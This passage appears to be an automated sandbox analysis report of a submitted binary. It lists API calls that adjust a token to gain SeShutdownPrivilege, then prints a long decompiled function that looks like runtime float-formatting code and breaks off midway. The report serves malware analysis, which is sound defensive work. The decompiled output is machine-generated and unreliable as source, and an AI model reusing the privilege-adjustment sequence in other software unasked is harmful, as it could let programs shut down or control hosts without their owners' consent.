                                            0x0040e3f9

                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000028,0040D7E7,00000000,?,?,?,?,0040D7E7), ref: 0040E3AC
                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040D7E7), ref: 0040E3B3
                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040E3C5
                                            • AdjustTokenPrivileges.ADVAPI32(0040D7E7,00000000,?,00000000,00000000,00000000), ref: 0040E3E4
                                            • GetLastError.KERNEL32 ref: 0040E3EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                            • String ID: SeShutdownPrivilege
                                            • API String ID: 3534403312-3733053543
                                            • Opcode ID: 5826d961ec71c2911ef4cf95c6418d102bce4e0f2212166629f5919c46ce31fe
                                            • Instruction ID: 9141c6b6d7a5f8ad6a0c3ea1d7c6e44db67c192798f154d3eef94d3d97387529
                                            • Opcode Fuzzy Hash: 5826d961ec71c2911ef4cf95c6418d102bce4e0f2212166629f5919c46ce31fe
                                            • Instruction Fuzzy Hash: 8AF0DAB5801129AFEB10ABA1DD0DEEF7FBCEF06215F100165B905A2151D6744E18DAA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00443116, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E00443116(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __esi;
				signed int _t725;
				signed int _t735;
				signed int _t736;
				signed int _t740;
				intOrPtr _t742;
				intOrPtr* _t743;
				intOrPtr* _t746;
				signed int _t751;
				signed int _t752;
				signed int _t758;
				signed int _t764;
				intOrPtr _t766;
				void* _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t778;
				signed int _t779;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t799;
				signed int _t800;
				signed int _t805;
				signed int _t806;
				signed int _t809;
				signed int _t813;
				signed int _t820;
				signed int* _t823;
				signed int _t826;
				signed int _t837;
				signed int _t838;
				signed int _t840;
				char* _t841;
				signed int _t843;
				signed int _t847;
				signed int _t848;
				signed int _t852;
				signed int _t854;
				signed int _t859;
				signed int _t867;
				signed int _t870;
				signed int _t872;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t880;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				char* _t897;
				signed int _t899;
				signed int _t903;
				signed int _t904;
				signed int* _t906;
				signed int _t908;
				signed int _t910;
				signed int _t915;
				signed int _t922;
				signed int _t925;
				signed int _t929;
				signed int* _t936;
				intOrPtr _t938;
				void* _t939;
				intOrPtr* _t941;
				signed int* _t945;
				unsigned int _t956;
				signed int _t957;
				void* _t960;
				signed int _t961;
				void* _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t974;
				signed int _t979;
				signed int _t982;
				unsigned int _t985;
				signed int _t986;
				void* _t989;
				signed int _t990;
				void* _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t999;
				signed int* _t1004;
				signed int _t1006;
				signed int _t1016;
				void _t1019;
				signed int _t1022;
				void* _t1025;
				signed int _t1036;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1049;
				signed int _t1053;
				signed int _t1054;
				signed int _t1055;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				unsigned int _t1070;
				void* _t1073;
				intOrPtr _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int* _t1082;
				void* _t1086;
				void* _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1090;
				signed int _t1093;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1104;
				char _t1109;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				unsigned int _t1128;
				void* _t1132;
				void* _t1133;
				unsigned int _t1134;
				signed int _t1139;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				intOrPtr* _t1145;
				signed int _t1146;
				signed int _t1147;
				signed int _t1150;
				signed int _t1151;
				signed int _t1154;
				signed int _t1156;
				signed int _t1157;
				void* _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int* _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				intOrPtr* _t1178;
				intOrPtr* _t1179;
				signed int _t1181;
				signed int _t1183;
				signed int _t1186;
				signed int _t1192;
				signed int _t1196;
				signed int _t1197;
				intOrPtr _t1199;
				intOrPtr _t1200;
				signed int _t1205;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int _t1226;
				signed int _t1227;
				signed int _t1229;
				signed int _t1231;
				signed int _t1233;
				signed int _t1235;
				signed int* _t1237;
				signed int* _t1241;
				signed int _t1250;

				_t725 =  *0x45f014; // 0x8d941b67
				_v8 = _t725 ^ _t1235;
				_t1016 = _a20;
				_t1145 = _a16;
				_v1924 = _t1145;
				_v1920 = _t1016;
				E004430EC( &_v1944, __eflags);
				_t1196 = _a8;
				_t730 = 0x2d;
				if((_t1196 & 0x80000000) == 0) {
					_t730 = 0x120;
				}
				 *_t1145 = _t730;
				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
				_t1146 = _a4;
				if((_t1196 & 0x7ff00000) != 0) {
					L5:
					_t735 = E00438F0A( &_a4);
					_pop(_t1031);
					__eflags = _t735;
					if(_t735 != 0) {
						_t1031 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t736 = _t735 - 1;
					__eflags = _t736;
					if(_t736 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t751 = _t736 - 1;
						__eflags = _t751;
						if(_t751 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t752 = _t751 - 1;
							__eflags = _t752;
							if(_t752 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t752 == 1;
								if(_t752 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1146;
									_a8 = _t1196 & 0x7fffffff;
									_t1250 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1150 = _v1896;
									_v1916 = _a12 + 1;
									_t1036 = _t1150 >> 0x14;
									_t758 = _t1036 & 0x000007ff;
									__eflags = _t758;
									if(_t758 != 0) {
										_t1101 = 0;
										_t758 = 0;
										__eflags = 0;
									} else {
										_t1101 = 1;
									}
									_t1151 = _t1150 & 0x000fffff;
									_t1019 = _v1900 + _t758;
									asm("adc edi, esi");
									__eflags = _t1101;
									_t1037 = _t1036 & 0x000007ff;
									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
									_v1872 = _t1205;
									E00446450(_t1037, _t1250);
									_push(_t1037);
									_push(_t1037);
									 *_t1237 = _t1250;
									_t764 = E00447260(E00446560(_t1151, _t1205), _t1250);
									_v1904 = _t764;
									__eflags = _t764 - 0x7fffffff;
									if(_t764 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t764 - 0x80000000;
										if(_t764 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1019;
									__eflags = _t1151;
									_v464 = _t1151;
									_t1022 = (0 | _t1151 != 0x00000000) + 1;
									_v472 = _t1022;
									__eflags = _t1205;
									if(_t1205 < 0) {
										__eflags = _t1205 - 0xfffffc02;
										if(_t1205 == 0xfffffc02) {
											L101:
											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1040 = 0;
												__eflags = 0;
											} else {
												_t1040 = _t766 + 1;
											}
											_t767 = 0x20;
											_t768 = _t767 - _t1040;
											__eflags = _t768 - 1;
											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
											__eflags = _t1022 - 0x73;
											_v1865 = _t769;
											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
											__eflags = _t1022 - 0x73;
											if(_t1022 != 0x73) {
												L107:
												_t770 = 0;
												__eflags = 0;
											} else {
												__eflags = _t769;
												if(_t769 == 0) {
													goto L107;
												} else {
													_t770 = 1;
												}
											}
											__eflags = _t1041;
											if(_t1041 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t770;
												if(_t770 != 0) {
													goto L126;
												} else {
													_t1068 = 0x72;
													__eflags = _t1022 - _t1068;
													if(_t1022 < _t1068) {
														_t1068 = _t1022;
													}
													__eflags = _t1068 - 0xffffffff;
													if(_t1068 != 0xffffffff) {
														_t1223 = _t1068;
														_t1178 =  &_v468 + _t1068 * 4;
														_v1880 = _t1178;
														while(1) {
															__eflags = _t1223 - _t1022;
															if(_t1223 >= _t1022) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1178;
															}
															_t210 = _t1223 - 1; // 0x70
															__eflags = _t210 - _t1022;
															if(_t210 >= _t1022) {
																_t1128 = 0;
																__eflags = 0;
															} else {
																_t1128 =  *(_t1178 - 4);
															}
															_t1178 = _t1178 - 4;
															_t936 = _v1880;
															_t1223 = _t1223 - 1;
															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t936 - 4;
															__eflags = _t1223 - 0xffffffff;
															if(_t1223 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														_t1205 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1068;
													} else {
														_t218 = _t1068 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1154 = 1 - _t1205;
											E0042B710(_t1154,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
											_t778 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1069 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1069;
											__eflags = _t1022 - _t1069;
											if(_t1022 == _t1069) {
												_t1132 = 0;
												__eflags = 0;
												while(1) {
													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
														goto L101;
													}
													_t1132 = _t1132 + 4;
													__eflags = _t1132 - 8;
													if(_t1132 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1133 = 0;
															__eflags = 0;
														} else {
															_t1133 = _t938 + 1;
														}
														_t939 = 0x20;
														_t1224 = _t1069;
														__eflags = _t939 - _t1133 - _t1069;
														_t941 =  &_v460;
														_v1880 = _t941;
														_t1179 = _t941;
														_t171 =  &_v1865;
														 *_t171 = _t939 - _t1133 - _t1069 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1224 - _t1022;
															if(_t1224 >= _t1022) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1179;
															}
															_t175 = _t1224 - 1; // 0x0
															__eflags = _t175 - _t1022;
															if(_t175 >= _t1022) {
																_t1134 = 0;
																__eflags = 0;
															} else {
																_t1134 =  *(_t1179 - 4);
															}
															_t1179 = _t1179 - 4;
															_t945 = _v1880;
															_t1224 = _t1224 - 1;
															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t945 - 4;
															__eflags = _t1224 - 0xffffffff;
															if(_t1224 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														__eflags = _v1865;
														_t1070 = _t1069 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
														_t1181 = _t1070 >> 5;
														_v1884 = _t1070;
														_t1226 = _t1181 << 2;
														E0042B710(_t1181,  &_v1396, 0, _t1226);
														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t778 = _t1181 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t778;
										_t1025 = 0x1cc;
										_v936 = _t778;
										_t779 = _t778 << 2;
										__eflags = _t779;
										_push(_t779);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1227 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1227;
										__eflags = _t1022 - _t1227;
										if(_t1022 != _t1227) {
											L53:
											_t956 = _v1872 + 1;
											_t957 = _t956 & 0x0000001f;
											_t1073 = 0x20;
											_v1876 = _t957;
											_t1183 = _t956 >> 5;
											_v1872 = _t1183;
											_v1908 = _t1073 - _t957;
											_t960 = E00447220(1, _t1073 - _t957, 0);
											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t961 = _t960 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t961;
											_v1912 =  !_t961;
											if( *_t108 == 0) {
												_t1076 = 0;
												__eflags = 0;
											} else {
												_t1076 = _t1075 + 1;
											}
											_t963 = 0x20;
											_t964 = _t963 - _t1076;
											_t1139 = _t1022 + _t1183;
											__eflags = _v1876 - _t964;
											_v1892 = _t1139;
											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
											__eflags = _t1139 - 0x73;
											_v1865 = _t965;
											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
											__eflags = _t1139 - 0x73;
											if(_t1139 != 0x73) {
												L59:
												_t966 = 0;
												__eflags = 0;
											} else {
												__eflags = _t965;
												if(_t965 == 0) {
													goto L59;
												} else {
													_t966 = 1;
												}
											}
											__eflags = _t1077;
											if(_t1077 != 0) {
												L81:
												__eflags = 0;
												_t1025 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t966;
												if(_t966 != 0) {
													goto L81;
												} else {
													_t1078 = 0x72;
													__eflags = _t1139 - _t1078;
													if(_t1139 >= _t1078) {
														_t1139 = _t1078;
														_v1892 = _t1078;
													}
													_t974 = _t1139;
													_v1880 = _t974;
													__eflags = _t1139 - 0xffffffff;
													if(_t1139 != 0xffffffff) {
														_t1140 = _v1872;
														_t1229 = _t1139 - _t1140;
														__eflags = _t1229;
														_t1082 =  &_v468 + _t1229 * 4;
														_v1888 = _t1082;
														while(1) {
															__eflags = _t974 - _t1140;
															if(_t974 < _t1140) {
																break;
															}
															__eflags = _t1229 - _t1022;
															if(_t1229 >= _t1022) {
																_t1186 = 0;
																__eflags = 0;
															} else {
																_t1186 =  *_t1082;
															}
															__eflags = _t1229 - 1 - _t1022;
															if(_t1229 - 1 >= _t1022) {
																_t979 = 0;
																__eflags = 0;
															} else {
																_t979 =  *(_t1082 - 4);
															}
															_t982 = _v1880;
															_t1082 = _v1888 - 4;
															_v1888 = _t1082;
															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
															_t974 = _t982 - 1;
															_t1229 = _t1229 - 1;
															_v1880 = _t974;
															__eflags = _t974 - 0xffffffff;
															if(_t974 != 0xffffffff) {
																_t1022 = _v472;
																continue;
															}
															break;
														}
														_t1139 = _v1892;
														_t1183 = _v1872;
														_t1227 = 2;
													}
													__eflags = _t1183;
													if(_t1183 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1183 << 2);
														_t1237 =  &(_t1237[3]);
													}
													__eflags = _v1865;
													_t1025 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1139;
													} else {
														_v472 = _t1139 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1227;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1086 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
													goto L53;
												}
												_t1086 = _t1086 + 4;
												__eflags = _t1086 - 8;
												if(_t1086 != 8) {
													continue;
												} else {
													_t985 = _v1872 + 2;
													_t986 = _t985 & 0x0000001f;
													_t1087 = 0x20;
													_t1088 = _t1087 - _t986;
													_v1888 = _t986;
													_t1231 = _t985 >> 5;
													_v1876 = _t1231;
													_v1908 = _t1088;
													_t989 = E00447220(1, _t1088, 0);
													_v1896 = _v1896 & 0x00000000;
													_t990 = _t989 - 1;
													__eflags = _t990;
													asm("bsr ecx, edi");
													_v1884 = _t990;
													_v1912 =  !_t990;
													if(_t990 == 0) {
														_t1089 = 0;
														__eflags = 0;
													} else {
														_t1089 = _t1088 + 1;
													}
													_t992 = 0x20;
													_t993 = _t992 - _t1089;
													_t1142 = _t1231 + 2;
													__eflags = _v1888 - _t993;
													_v1880 = _t1142;
													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
													__eflags = _t1142 - 0x73;
													_v1865 = _t994;
													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
													__eflags = _t1142 - 0x73;
													if(_t1142 != 0x73) {
														L28:
														_t995 = 0;
														__eflags = 0;
													} else {
														__eflags = _t994;
														if(_t994 == 0) {
															goto L28;
														} else {
															_t995 = 1;
														}
													}
													__eflags = _t1090;
													if(_t1090 != 0) {
														L50:
														__eflags = 0;
														_t1025 = 0x1cc;
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L313();
														_t1237 =  &(_t1237[4]);
													} else {
														__eflags = _t995;
														if(_t995 != 0) {
															goto L50;
														} else {
															_t1093 = 0x72;
															__eflags = _t1142 - _t1093;
															if(_t1142 >= _t1093) {
																_t1142 = _t1093;
																_v1880 = _t1093;
															}
															_t1094 = _t1142;
															_v1892 = _t1094;
															__eflags = _t1142 - 0xffffffff;
															if(_t1142 != 0xffffffff) {
																_t1143 = _v1876;
																_t1233 = _t1142 - _t1143;
																__eflags = _t1233;
																_t1004 =  &_v468 + _t1233 * 4;
																_v1872 = _t1004;
																while(1) {
																	__eflags = _t1094 - _t1143;
																	if(_t1094 < _t1143) {
																		break;
																	}
																	__eflags = _t1233 - _t1022;
																	if(_t1233 >= _t1022) {
																		_t1192 = 0;
																		__eflags = 0;
																	} else {
																		_t1192 =  *_t1004;
																	}
																	__eflags = _t1233 - 1 - _t1022;
																	if(_t1233 - 1 >= _t1022) {
																		_t1006 = 0;
																		__eflags = 0;
																	} else {
																		_t1006 =  *(_v1872 - 4);
																	}
																	_t1099 = _v1892;
																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
																	_t1094 = _t1099 - 1;
																	_t1233 = _t1233 - 1;
																	_t1004 = _v1872 - 4;
																	_v1892 = _t1094;
																	_v1872 = _t1004;
																	__eflags = _t1094 - 0xffffffff;
																	if(_t1094 != 0xffffffff) {
																		_t1022 = _v472;
																		continue;
																	}
																	break;
																}
																_t1142 = _v1880;
																_t1231 = _v1876;
															}
															__eflags = _t1231;
															if(_t1231 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1231 << 2);
																_t1237 =  &(_t1237[3]);
															}
															__eflags = _v1865;
															_t1025 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1142;
															} else {
																_v472 = _t1142 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t999 = 4;
													__eflags = 1;
													_v1396 = _t999;
													_v1400 = 1;
													_v936 = 1;
													_push(_t999);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1025);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[4]);
									}
									_t782 = _v1904;
									_t1043 = 0xa;
									_v1912 = _t1043;
									__eflags = _t782;
									if(_t782 < 0) {
										_t783 =  ~_t782;
										_t784 = _t783 / _t1043;
										_v1880 = _t784;
										_t1044 = _t783 % _t1043;
										_v1884 = _t1044;
										__eflags = _t784;
										if(_t784 == 0) {
											L249:
											__eflags = _t1044;
											if(_t1044 != 0) {
												_t820 =  *(0x44e57c + _t1044 * 4);
												_v1896 = _t820;
												__eflags = _t820;
												if(_t820 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t820 - 1;
													if(_t820 != 1) {
														_t1055 = _v472;
														__eflags = _t1055;
														if(_t1055 != 0) {
															_t1161 = 0;
															_t1213 = 0;
															__eflags = 0;
															do {
																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
																_t820 = _v1896;
																asm("adc edx, 0x0");
																_t1213 = _t1213 + 1;
																_t1161 = _t1113;
																__eflags = _t1213 - _t1055;
															} while (_t1213 != _t1055);
															__eflags = _t1161;
															if(_t1161 != 0) {
																_t826 = _v472;
																__eflags = _t826 - 0x73;
																if(_t826 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t784 - 0x26;
												if(_t784 > 0x26) {
													_t784 = 0x26;
												}
												_t1056 =  *(0x44e4e6 + _t784 * 4) & 0x000000ff;
												_v1872 = _t784;
												_v1400 = ( *(0x44e4e6 + _t784 * 4) & 0x000000ff) + ( *(0x44e4e7 + _t784 * 4) & 0x000000ff);
												E0042B710(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
												_t837 = E0042BC80( &(( &_v1396)[_t1056]), 0x44dbe0 + ( *(0x44e4e4 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x44e4e7 + _t784 * 4) & 0x000000ff) << 2);
												_t1057 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1057;
												__eflags = _t1057 - 1;
												if(_t1057 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1057 - _v472;
														_t1164 =  &_v1396;
														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
														__eflags = _t838;
														if(_t838 != 0) {
															_t1114 =  &_v468;
														} else {
															_t1164 =  &_v468;
															_t1114 =  &_v1396;
														}
														_v1908 = _t1114;
														__eflags = _t838;
														if(_t838 == 0) {
															_t1057 = _v472;
														}
														_v1876 = _t1057;
														__eflags = _t838;
														if(_t838 != 0) {
															_v1892 = _v472;
														}
														_t1115 = 0;
														_t1215 = 0;
														_v1864 = 0;
														__eflags = _t1057;
														if(_t1057 == 0) {
															L243:
															_v472 = _t1115;
															_t840 = _t1115 << 2;
															__eflags = _t840;
															_push(_t840);
															_t841 =  &_v1860;
															goto L244;
														} else {
															_t1165 = _t1164 -  &_v1860;
															__eflags = _t1165;
															_v1928 = _t1165;
															do {
																_t847 =  *(_t1235 + _t1165 + _t1215 * 4 - 0x740);
																_v1896 = _t847;
																__eflags = _t847;
																if(_t847 != 0) {
																	_t848 = 0;
																	_t1166 = 0;
																	_t1058 = _t1215;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1058 - 0x73;
																		if(_t1058 == 0x73) {
																			goto L258;
																		} else {
																			_t1165 = _v1928;
																			_t1057 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1058 - 0x73;
																			if(_t1058 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1058 - _t1115;
																			if(_t1058 == _t1115) {
																				 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																				_t859 = _t848 + 1 + _t1215;
																				__eflags = _t859;
																				_v1864 = _t859;
																				_t848 = _v1888;
																			}
																			_t854 =  *(_v1908 + _t848 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1166;
																			asm("adc edx, 0x0");
																			_t848 = _v1888 + 1;
																			_t1058 = _t1058 + 1;
																			_v1888 = _t848;
																			_t1166 = _t854 * _v1896 >> 0x20;
																			_t1115 = _v1864;
																			__eflags = _t848 - _v1892;
																			if(_t848 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1166;
																				if(_t1166 == 0) {
																					goto L240;
																				}
																				__eflags = _t1058 - 0x73;
																				if(_t1058 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1058 - _t1115;
																					if(_t1058 == _t1115) {
																						_t558 = _t1235 + _t1058 * 4 - 0x740;
																						 *_t558 =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1058 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t852 = _t1166;
																					_t1166 = 0;
																					 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t852;
																					_t1115 = _v1864;
																					asm("adc edi, edi");
																					_t1058 = _t1058 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1215 - _t1115;
																	if(_t1215 == _t1115) {
																		 *(_t1235 + _t1215 * 4 - 0x740) =  *(_t1235 + _t1215 * 4 - 0x740) & _t847;
																		_t526 = _t1215 + 1; // 0x1
																		_t1115 = _t526;
																		_v1864 = _t1115;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1215 = _t1215 + 1;
																__eflags = _t1215 - _t1057;
															} while (_t1215 != _t1057);
															goto L243;
														}
													} else {
														_t1167 = _v468;
														_push(_t1057 << 2);
														_v472 = _t1057;
														_push( &_v1396);
														_push(_t1025);
														_push( &_v468);
														L313();
														_t1241 =  &(_t1241[4]);
														__eflags = _t1167;
														if(_t1167 == 0) {
															goto L203;
														} else {
															__eflags = _t1167 - 1;
															if(_t1167 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1059 = 0;
																	_v1896 = _v472;
																	_t1216 = 0;
																	__eflags = 0;
																	do {
																		_t867 = _t1167;
																		_t1116 = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) >> 0x20;
																		 *(_t1235 + _t1216 * 4 - 0x1d0) = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) + _t1059;
																		asm("adc edx, 0x0");
																		_t1216 = _t1216 + 1;
																		_t1059 = _t1116;
																		__eflags = _t1216 - _v1896;
																	} while (_t1216 != _v1896);
